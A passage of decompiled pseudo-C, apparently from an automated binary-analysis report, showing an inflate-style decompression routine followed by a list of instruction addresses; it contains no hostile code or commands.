                                                  											L123:
                                                  											__esi[2] = __ecx;
                                                  											__esi[3] = __eax;
                                                  											 *__esi = 4;
                                                  											goto L180;
                                                  										case 4:
                                                  											L126:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L129:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L127:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L128:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L130:
                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - __eax;
                                                  											__eflags = __ebx;
                                                  											 *__esi = 5;
                                                  											goto L131;
                                                  										case 5:
                                                  											L131:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__edx = __esi[3];
                                                  											__eax = __eax - __esi;
                                                  											__ecx = __eax - __esi - 0x1ba0;
                                                  											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                  											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                  												__ecx = __eax;
                                                  												__ecx = __eax - __edx;
                                                  												__eflags = __ecx;
                                                  											} else {
                                                  												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                  												__ecx = __esi[0x26e8] - __edx - __esi;
                                                  												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                  											}
                                                  											__eflags = __esi[1];
                                                  											 *(__ebp - 0x20) = __ecx;
                                                  											if(__esi[1] != 0) {
                                                  												L135:
                                                  												__edi =  *(__ebp - 0x2c);
                                                  												do {
                                                  													L136:
                                                  													__eflags = __edi;
                                                  													if(__edi != 0) {
                                                  														goto L152;
                                                  													}
                                                  													L137:
                                                  													__edi = __esi[0x26e8];
                                                  													__eflags = __eax - __edi;
                                                  													if(__eax != __edi) {
                                                  														L143:
                                                  														__esi[0x26ea] = __eax;
                                                  														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  														__eax = __esi[0x26ea];
                                                  														__ecx = __esi[0x26e9];
                                                  														__eflags = __eax - __ecx;
                                                  														 *(__ebp - 0x30) = __eax;
                                                  														if(__eax >= __ecx) {
                                                  															__edi = __esi[0x26e8];
                                                  															__edi = __esi[0x26e8] - __eax;
                                                  															__eflags = __edi;
                                                  														} else {
                                                  															__ecx = __ecx - __eax;
                                                  															__edi = __ecx - __eax - 1;
                                                  														}
                                                  														__edx = __esi[0x26e8];
                                                  														__eflags = __eax - __edx;
                                                  														 *(__ebp - 8) = __edx;
                                                  														if(__eax == __edx) {
                                                  															__edx =  &(__esi[0x6e8]);
                                                  															__eflags = __ecx - __edx;
                                                  															if(__ecx != __edx) {
                                                  																__eax = __edx;
                                                  																__eflags = __eax - __ecx;
                                                  																 *(__ebp - 0x30) = __eax;
                                                  																if(__eax >= __ecx) {
                                                  																	__edi =  *(__ebp - 8);
                                                  																	__edi =  *(__ebp - 8) - __eax;
                                                  																	__eflags = __edi;
                                                  																} else {
                                                  																	__ecx = __ecx - __eax;
                                                  																	__edi = __ecx;
                                                  																}
                                                  															}
                                                  														}
                                                  														__eflags = __edi;
                                                  														if(__edi == 0) {
                                                  															goto L183;
                                                  														} else {
                                                  															goto L152;
                                                  														}
                                                  													}
                                                  													L138:
                                                  													__ecx = __esi[0x26e9];
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __ecx - __edx;
                                                  													if(__ecx == __edx) {
                                                  														goto L143;
                                                  													}
                                                  													L139:
                                                  													__eax = __edx;
                                                  													__eflags = __eax - __ecx;
                                                  													if(__eax >= __ecx) {
                                                  														__edi = __edi - __eax;
                                                  														__eflags = __edi;
                                                  													} else {
                                                  														__ecx = __ecx - __eax;
                                                  														__edi = __ecx;
                                                  													}
                                                  													__eflags = __edi;
                                                  													if(__edi == 0) {
                                                  														goto L143;
                                                  													}
                                                  													L152:
                                                  													__ecx =  *(__ebp - 0x20);
                                                  													 *__eax =  *__ecx;
                                                  													__eax = __eax + 1;
                                                  													__ecx = __ecx + 1;
                                                  													__edi = __edi - 1;
                                                  													__eflags = __ecx - __esi[0x26e8];
                                                  													 *(__ebp - 0x30) = __eax;
                                                  													 *(__ebp - 0x20) = __ecx;
                                                  													 *(__ebp - 0x2c) = __edi;
                                                  													if(__ecx == __esi[0x26e8]) {
                                                  														__ecx =  &(__esi[0x6e8]);
                                                  														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                  													}
                                                  													_t357 =  &(__esi[1]);
                                                  													 *_t357 = __esi[1] - 1;
                                                  													__eflags =  *_t357;
                                                  												} while ( *_t357 != 0);
                                                  											}
                                                  											goto L23;
                                                  										case 6:
                                                  											L156:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__edi =  *(__ebp - 0x30);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L172:
                                                  												__cl = __esi[2];
                                                  												 *__edi = __cl;
                                                  												__edi = __edi + 1;
                                                  												__eax = __eax - 1;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												goto L23;
                                                  											}
                                                  											L157:
                                                  											__ecx = __esi[0x26e8];
                                                  											__eflags = __edi - __ecx;
                                                  											if(__edi != __ecx) {
                                                  												L163:
                                                  												__esi[0x26ea] = __edi;
                                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  												__edi = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edi - __ecx;
                                                  												 *(__ebp - 0x30) = __edi;
                                                  												if(__edi >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edi;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edi;
                                                  													__eax = __ecx - __edi - 1;
                                                  												}
                                                  												__edx = __esi[0x26e8];
                                                  												__eflags = __edi - __edx;
                                                  												 *(__ebp - 8) = __edx;
                                                  												if(__edi == __edx) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __ecx - __edx;
                                                  													if(__ecx != __edx) {
                                                  														__edi = __edx;
                                                  														__eflags = __edi - __ecx;
                                                  														 *(__ebp - 0x30) = __edi;
                                                  														if(__edi >= __ecx) {
                                                  															__eax =  *(__ebp - 8);
                                                  															__eax =  *(__ebp - 8) - __edi;
                                                  															__eflags = __eax;
                                                  														} else {
                                                  															__ecx = __ecx - __edi;
                                                  															__eax = __ecx;
                                                  														}
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L183;
                                                  												} else {
                                                  													goto L172;
                                                  												}
                                                  											}
                                                  											L158:
                                                  											__eax = __esi[0x26e9];
                                                  											__edx =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edx;
                                                  											if(__eax == __edx) {
                                                  												goto L163;
                                                  											}
                                                  											L159:
                                                  											__edi = __edx;
                                                  											__eflags = __edi - __eax;
                                                  											if(__edi >= __eax) {
                                                  												__ecx = __ecx - __edi;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edi;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L172;
                                                  											} else {
                                                  												goto L163;
                                                  											}
                                                  										case 7:
                                                  											L173:
                                                  											__eflags = __ebx - 7;
                                                  											if(__ebx > 7) {
                                                  												__ebx = __ebx - 8;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                  												_t380 = __ebp - 0x38;
                                                  												 *_t380 =  *(__ebp - 0x38) - 1;
                                                  												__eflags =  *_t380;
                                                  											}
                                                  											goto L175;
                                                  										case 8:
                                                  											L4:
                                                  											while(_t425 < 3) {
                                                  												if( *(_t448 - 0x34) == 0) {
                                                  													goto L182;
                                                  												} else {
                                                  													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                  													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                  													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                  													_t425 = _t425 + 8;
                                                  													continue;
                                                  												}
                                                  											}
                                                  											_t425 = _t425 - 3;
                                                  											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                  											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                  											asm("sbb ecx, ecx");
                                                  											_t408 = _t406 >> 1;
                                                  											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                  											if(_t408 == 0) {
                                                  												L24:
                                                  												 *_t446 = 9;
                                                  												_t436 = _t425 & 0x00000007;
                                                  												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                  												_t425 = _t425 - _t436;
                                                  												goto L180;
                                                  											}
                                                  											L6:
                                                  											_t411 = _t408 - 1;
                                                  											if(_t411 == 0) {
                                                  												L13:
                                                  												__eflags =  *0x432e90;
                                                  												if( *0x432e90 != 0) {
                                                  													L22:
                                                  													_t412 =  *0x40a5e8; // 0x9
                                                  													_t446[4] = _t412;
                                                  													_t413 =  *0x40a5ec; // 0x5
                                                  													_t446[4] = _t413;
                                                  													_t414 =  *0x431d0c; // 0x0
                                                  													_t446[5] = _t414;
                                                  													_t415 =  *0x431d08; // 0x0
                                                  													_t446[6] = _t415;
                                                  													L23:
                                                  													 *_t446 =  *_t446 & 0x00000000;
                                                  													goto L180;
                                                  												} else {
                                                  													_t26 = _t448 - 8;
                                                  													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                  													__eflags =  *_t26;
                                                  													_t416 = 0x431d10;
                                                  													goto L15;
                                                  													L20:
                                                  													 *_t416 = _t438;
                                                  													_t416 = _t416 + 4;
                                                  													__eflags = _t416 - 0x432190;
                                                  													if(_t416 < 0x432190) {
                                                  														L15:
                                                  														__eflags = _t416 - 0x431f4c;
                                                  														_t438 = 8;
                                                  														if(_t416 > 0x431f4c) {
                                                  															__eflags = _t416 - 0x432110;
                                                  															if(_t416 >= 0x432110) {
                                                  																__eflags = _t416 - 0x432170;
                                                  																if(_t416 < 0x432170) {
                                                  																	_t438 = 7;
                                                  																}
                                                  															} else {
                                                  																_t438 = 9;
                                                  															}
                                                  														}
                                                  														goto L20;
                                                  													} else {
                                                  														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                  														_push(0x1e);
                                                  														_pop(_t440);
                                                  														_push(5);
                                                  														_pop(_t419);
                                                  														memset(0x431d10, _t419, _t440 << 2);
                                                  														_t450 = _t450 + 0xc;
                                                  														_t442 = 0x431d10 + _t440;
                                                  														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                  														 *0x432e90 =  *0x432e90 + 1;
                                                  														__eflags =  *0x432e90;
                                                  														goto L22;
                                                  													}
                                                  												}
                                                  											}
                                                  											L7:
                                                  											_t423 = _t411 - 1;
                                                  											if(_t423 == 0) {
                                                  												 *_t446 = 0xb;
                                                  												goto L180;
                                                  											}
                                                  											L8:
                                                  											if(_t423 != 1) {
                                                  												goto L180;
                                                  											}
                                                  											goto L9;
                                                  										case 9:
                                                  											while(1) {
                                                  												L27:
                                                  												__eflags = __ebx - 0x20;
                                                  												if(__ebx >= 0x20) {
                                                  													break;
                                                  												}
                                                  												L25:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L26:
                                                  												__eax =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__ecx = __ebx;
                                                  												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L28:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__ebx = 0;
                                                  											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                  											 *(__ebp - 0x40) = 0;
                                                  											__eflags = __eax;
                                                  											__esi[1] = __eax;
                                                  											if(__eax == 0) {
                                                  												goto L53;
                                                  											}
                                                  											L29:
                                                  											_push(0xa);
                                                  											_pop(__eax);
                                                  											goto L54;
                                                  										case 0xa:
                                                  											L30:
                                                  											__eflags =  *(__ebp - 0x34);
                                                  											if( *(__ebp - 0x34) == 0) {
                                                  												goto L182;
                                                  											}
                                                  											L31:
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												L48:
                                                  												__eflags = __eax -  *(__ebp - 0x34);
                                                  												if(__eax >=  *(__ebp - 0x34)) {
                                                  													__eax =  *(__ebp - 0x34);
                                                  												}
                                                  												__ecx = __esi[1];
                                                  												__eflags = __ecx - __eax;
                                                  												__edi = __ecx;
                                                  												if(__ecx >= __eax) {
                                                  													__edi = __eax;
                                                  												}
                                                  												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                  												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                  												_t80 =  &(__esi[1]);
                                                  												 *_t80 = __esi[1] - __edi;
                                                  												__eflags =  *_t80;
                                                  												if( *_t80 == 0) {
                                                  													L53:
                                                  													__eax = __esi[0x145];
                                                  													L54:
                                                  													 *__esi = __eax;
                                                  												}
                                                  												goto L180;
                                                  											}
                                                  											L32:
                                                  											__ecx = __esi[0x26e8];
                                                  											__edx =  *(__ebp - 0x30);
                                                  											__eflags = __edx - __ecx;
                                                  											if(__edx != __ecx) {
                                                  												L38:
                                                  												__esi[0x26ea] = __edx;
                                                  												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  												__edx = __esi[0x26ea];
                                                  												__ecx = __esi[0x26e9];
                                                  												__eflags = __edx - __ecx;
                                                  												 *(__ebp - 0x30) = __edx;
                                                  												if(__edx >= __ecx) {
                                                  													__eax = __esi[0x26e8];
                                                  													__eax = __esi[0x26e8] - __edx;
                                                  													__eflags = __eax;
                                                  												} else {
                                                  													__ecx = __ecx - __edx;
                                                  													__eax = __ecx - __edx - 1;
                                                  												}
                                                  												__edi = __esi[0x26e8];
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												__eflags = __edx - __edi;
                                                  												if(__edx == __edi) {
                                                  													__edx =  &(__esi[0x6e8]);
                                                  													__eflags = __edx - __ecx;
                                                  													if(__eflags != 0) {
                                                  														 *(__ebp - 0x30) = __edx;
                                                  														if(__eflags >= 0) {
                                                  															__edi = __edi - __edx;
                                                  															__eflags = __edi;
                                                  															__eax = __edi;
                                                  														} else {
                                                  															__ecx = __ecx - __edx;
                                                  															__eax = __ecx;
                                                  														}
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  													}
                                                  												}
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													goto L183;
                                                  												} else {
                                                  													goto L48;
                                                  												}
                                                  											}
                                                  											L33:
                                                  											__eax = __esi[0x26e9];
                                                  											__edi =  &(__esi[0x6e8]);
                                                  											__eflags = __eax - __edi;
                                                  											if(__eax == __edi) {
                                                  												goto L38;
                                                  											}
                                                  											L34:
                                                  											__edx = __edi;
                                                  											__eflags = __edx - __eax;
                                                  											 *(__ebp - 0x30) = __edx;
                                                  											if(__edx >= __eax) {
                                                  												__ecx = __ecx - __edx;
                                                  												__eflags = __ecx;
                                                  												__eax = __ecx;
                                                  											} else {
                                                  												__eax = __eax - __edx;
                                                  												__eax = __eax - 1;
                                                  											}
                                                  											__eflags = __eax;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L48;
                                                  											} else {
                                                  												goto L38;
                                                  											}
                                                  										case 0xb:
                                                  											goto L56;
                                                  										case 0xc:
                                                  											L60:
                                                  											__esi[1] = __esi[1] >> 0xa;
                                                  											__eax = (__esi[1] >> 0xa) + 4;
                                                  											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  												goto L68;
                                                  											}
                                                  											goto L61;
                                                  										case 0xd:
                                                  											while(1) {
                                                  												L93:
                                                  												__eax = __esi[1];
                                                  												__ecx = __esi[2];
                                                  												__edx = __eax;
                                                  												__eax = __eax & 0x0000001f;
                                                  												__edx = __edx >> 5;
                                                  												__eax = __edx + __eax + 0x102;
                                                  												__eflags = __esi[2] - __eax;
                                                  												if(__esi[2] >= __eax) {
                                                  													break;
                                                  												}
                                                  												L73:
                                                  												__eax = __esi[0x143];
                                                  												while(1) {
                                                  													L76:
                                                  													__eflags = __ebx - __eax;
                                                  													if(__ebx >= __eax) {
                                                  														break;
                                                  													}
                                                  													L74:
                                                  													__eflags =  *(__ebp - 0x34);
                                                  													if( *(__ebp - 0x34) == 0) {
                                                  														goto L182;
                                                  													}
                                                  													L75:
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  													__ecx = __ebx;
                                                  													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  													__ebx = __ebx + 8;
                                                  													__eflags = __ebx;
                                                  												}
                                                  												L77:
                                                  												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  												__eax = __eax &  *(__ebp - 0x40);
                                                  												__ecx = __esi[0x144];
                                                  												__eax = __esi[0x144] + __eax * 4;
                                                  												__edx =  *(__eax + 1) & 0x000000ff;
                                                  												__eax =  *(__eax + 2) & 0x0000ffff;
                                                  												__eflags = __eax - 0x10;
                                                  												 *(__ebp - 0x14) = __eax;
                                                  												if(__eax >= 0x10) {
                                                  													L79:
                                                  													__eflags = __eax - 0x12;
                                                  													if(__eax != 0x12) {
                                                  														__eax = __eax + 0xfffffff2;
                                                  														 *(__ebp - 8) = 3;
                                                  													} else {
                                                  														_push(7);
                                                  														 *(__ebp - 8) = 0xb;
                                                  														_pop(__eax);
                                                  													}
                                                  													while(1) {
                                                  														L84:
                                                  														__ecx = __eax + __edx;
                                                  														__eflags = __ebx - __eax + __edx;
                                                  														if(__ebx >= __eax + __edx) {
                                                  															break;
                                                  														}
                                                  														L82:
                                                  														__eflags =  *(__ebp - 0x34);
                                                  														if( *(__ebp - 0x34) == 0) {
                                                  															goto L182;
                                                  														}
                                                  														L83:
                                                  														__ecx =  *(__ebp - 0x38);
                                                  														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  														__ecx = __ebx;
                                                  														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  														__ebx = __ebx + 8;
                                                  														__eflags = __ebx;
                                                  													}
                                                  													L85:
                                                  													__ecx = __edx;
                                                  													__ebx = __ebx - __edx;
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  													__edx =  *(__ebp - 8);
                                                  													__ebx = __ebx - __eax;
                                                  													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  													__ecx = __eax;
                                                  													__eax = __esi[1];
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  													__ecx = __esi[2];
                                                  													__eax = __eax >> 5;
                                                  													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                  													__eax = __eax & 0x0000001f;
                                                  													__eax = __edi + __eax + 0x102;
                                                  													__edi = __edx + __ecx;
                                                  													__eflags = __edx + __ecx - __eax;
                                                  													if(__edx + __ecx > __eax) {
                                                  														goto L9;
                                                  													}
                                                  													L86:
                                                  													__eflags =  *(__ebp - 0x14) - 0x10;
                                                  													if( *(__ebp - 0x14) != 0x10) {
                                                  														L89:
                                                  														__edi = 0;
                                                  														__eflags = 0;
                                                  														L90:
                                                  														__eax = __esi + 0xc + __ecx * 4;
                                                  														do {
                                                  															L91:
                                                  															 *__eax = __edi;
                                                  															__ecx = __ecx + 1;
                                                  															__eax = __eax + 4;
                                                  															__edx = __edx - 1;
                                                  															__eflags = __edx;
                                                  														} while (__edx != 0);
                                                  														__esi[2] = __ecx;
                                                  														continue;
                                                  													}
                                                  													L87:
                                                  													__eflags = __ecx - 1;
                                                  													if(__ecx < 1) {
                                                  														goto L9;
                                                  													}
                                                  													L88:
                                                  													__edi =  *(__esi + 8 + __ecx * 4);
                                                  													goto L90;
                                                  												}
                                                  												L78:
                                                  												__ecx = __edx;
                                                  												__ebx = __ebx - __edx;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  												__ecx = __esi[2];
                                                  												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                  												__esi[2] = __esi[2] + 1;
                                                  											}
                                                  											L94:
                                                  											__eax = __esi[1];
                                                  											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                  											__edi = __eax;
                                                  											__eax = __eax >> 5;
                                                  											__edi = __edi & 0x0000001f;
                                                  											__ecx = 0x101;
                                                  											__eax = __eax & 0x0000001f;
                                                  											__edi = __edi + 0x101;
                                                  											__eax = __eax + 1;
                                                  											__edx = __ebp - 0xc;
                                                  											 *(__ebp - 0x14) = __eax;
                                                  											 &(__esi[0x148]) = __ebp - 4;
                                                  											 *(__ebp - 4) = 9;
                                                  											__ebp - 0x18 =  &(__esi[3]);
                                                  											 *(__ebp - 0x10) = 6;
                                                  											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                  											__eflags =  *(__ebp - 4);
                                                  											if( *(__ebp - 4) == 0) {
                                                  												__eax = __eax | 0xffffffff;
                                                  												__eflags = __eax;
                                                  											}
                                                  											__eflags = __eax;
                                                  											if(__eax != 0) {
                                                  												goto L9;
                                                  											} else {
                                                  												L97:
                                                  												__ebp - 0xc =  &(__esi[0x148]);
                                                  												__ebp - 0x10 = __ebp - 0x1c;
                                                  												__eax = __esi + 0xc + __edi * 4;
                                                  												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                  												__eflags = __eax;
                                                  												if(__eax != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L98:
                                                  												__eax =  *(__ebp - 0x10);
                                                  												__eflags =  *(__ebp - 0x10);
                                                  												if( *(__ebp - 0x10) != 0) {
                                                  													L100:
                                                  													__cl =  *(__ebp - 4);
                                                  													 *__esi =  *__esi & 0x00000000;
                                                  													__eflags =  *__esi;
                                                  													__esi[4] = __al;
                                                  													__eax =  *(__ebp - 0x18);
                                                  													__esi[5] =  *(__ebp - 0x18);
                                                  													__eax =  *(__ebp - 0x1c);
                                                  													__esi[4] = __cl;
                                                  													__esi[6] =  *(__ebp - 0x1c);
                                                  													goto L101;
                                                  												}
                                                  												L99:
                                                  												__eflags = __edi - 0x101;
                                                  												if(__edi > 0x101) {
                                                  													goto L9;
                                                  												}
                                                  												goto L100;
                                                  											}
                                                  										case 0xe:
                                                  											goto L9;
                                                  										case 0xf:
                                                  											L175:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__esi[0x26ea] =  *(__ebp - 0x30);
                                                  											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                  											__ecx = __esi[0x26ea];
                                                  											__edx = __esi[0x26e9];
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x30) = __ecx;
                                                  											if(__ecx >= __edx) {
                                                  												__eax = __esi[0x26e8];
                                                  												__eax = __esi[0x26e8] - __ecx;
                                                  												__eflags = __eax;
                                                  											} else {
                                                  												__edx = __edx - __ecx;
                                                  												__eax = __edx - __ecx - 1;
                                                  											}
                                                  											__eflags = __ecx - __edx;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ecx != __edx) {
                                                  												L183:
                                                  												__edi = 0;
                                                  												goto L10;
                                                  											} else {
                                                  												L179:
                                                  												__eax = __esi[0x145];
                                                  												__eflags = __eax - 8;
                                                  												 *__esi = __eax;
                                                  												if(__eax != 8) {
                                                  													L184:
                                                  													0 = 1;
                                                  													goto L10;
                                                  												}
                                                  												goto L180;
                                                  											}
                                                  									}
                                                  								}
                                                  								L181:
                                                  								goto L9;
                                                  							}
                                                  							L70:
                                                  							if( *__edi == __eax) {
                                                  								goto L72;
                                                  							}
                                                  							L71:
                                                  							__esi[2] = __esi[2] & __eax;
                                                  							 *__esi = 0xd;
                                                  							goto L93;
                                                  						}
                                                  					}
                                                  				}
                                                  				L182:
                                                  				_t443 = 0;
                                                  				_t446[0x147] =  *(_t448 - 0x40);
                                                  				_t446[0x146] = _t425;
                                                  				( *(_t448 + 8))[1] = 0;
                                                  				goto L11;
                                                  			}









                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d85
                                                  0x00406d89
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d8f
                                                  0x00406d8f
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9a
                                                  0x00406d9c
                                                  0x00406d9f
                                                  0x00406da2
                                                  0x00406da5
                                                  0x00406da5
                                                  0x00406da8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406daa
                                                  0x00406daa
                                                  0x00406dad
                                                  0x00406db2
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dbd
                                                  0x00406b1c
                                                  0x00406b1c
                                                  0x00406b1f
                                                  0x00406b25
                                                  0x00406b2b
                                                  0x00406b34
                                                  0x00406b3a
                                                  0x00406b3d
                                                  0x00406b44
                                                  0x00406b49
                                                  0x00406b4f
                                                  0x00406b5a
                                                  0x00406b5a
                                                  0x00406dc3
                                                  0x00406dc3
                                                  0x00406dcd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406dd3
                                                  0x00406dd3
                                                  0x00406dd7
                                                  0x00406dda
                                                  0x00406dda
                                                  0x00406dde
                                                  0x00406de4
                                                  0x00406de4
                                                  0x00406de7
                                                  0x00406dea
                                                  0x00406df0
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df2
                                                  0x00406e14
                                                  0x00406e14
                                                  0x00406e17
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df4
                                                  0x00406df8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406dfe
                                                  0x00406dfe
                                                  0x00406e01
                                                  0x00406e04
                                                  0x00406e09
                                                  0x00406e0b
                                                  0x00406e0e
                                                  0x00406e11
                                                  0x00406e11
                                                  0x00406e19
                                                  0x00406e19
                                                  0x00406e1f
                                                  0x00406e22
                                                  0x00406e25
                                                  0x00406e25
                                                  0x00406e2c
                                                  0x00406e30
                                                  0x00406e34
                                                  0x00406e37
                                                  0x00406e3a
                                                  0x00406e40
                                                  0x00406e45
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e47
                                                  0x00406e5b
                                                  0x00406e5b
                                                  0x00406e5f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e49
                                                  0x00406e4c
                                                  0x00406e4c
                                                  0x00406e53
                                                  0x00406e58
                                                  0x00406e58
                                                  0x00406e58
                                                  0x00406e61
                                                  0x00406e61
                                                  0x00406e64
                                                  0x00406e72
                                                  0x00406e78
                                                  0x00406e7d
                                                  0x00406e83
                                                  0x00406e89
                                                  0x00406e8f
                                                  0x00406e96
                                                  0x00406eaa
                                                  0x00406eaa
                                                  0x00407479
                                                  0x00407479
                                                  0x00407479
                                                  0x0040747e
                                                  0x00000000
                                                  0x00000000
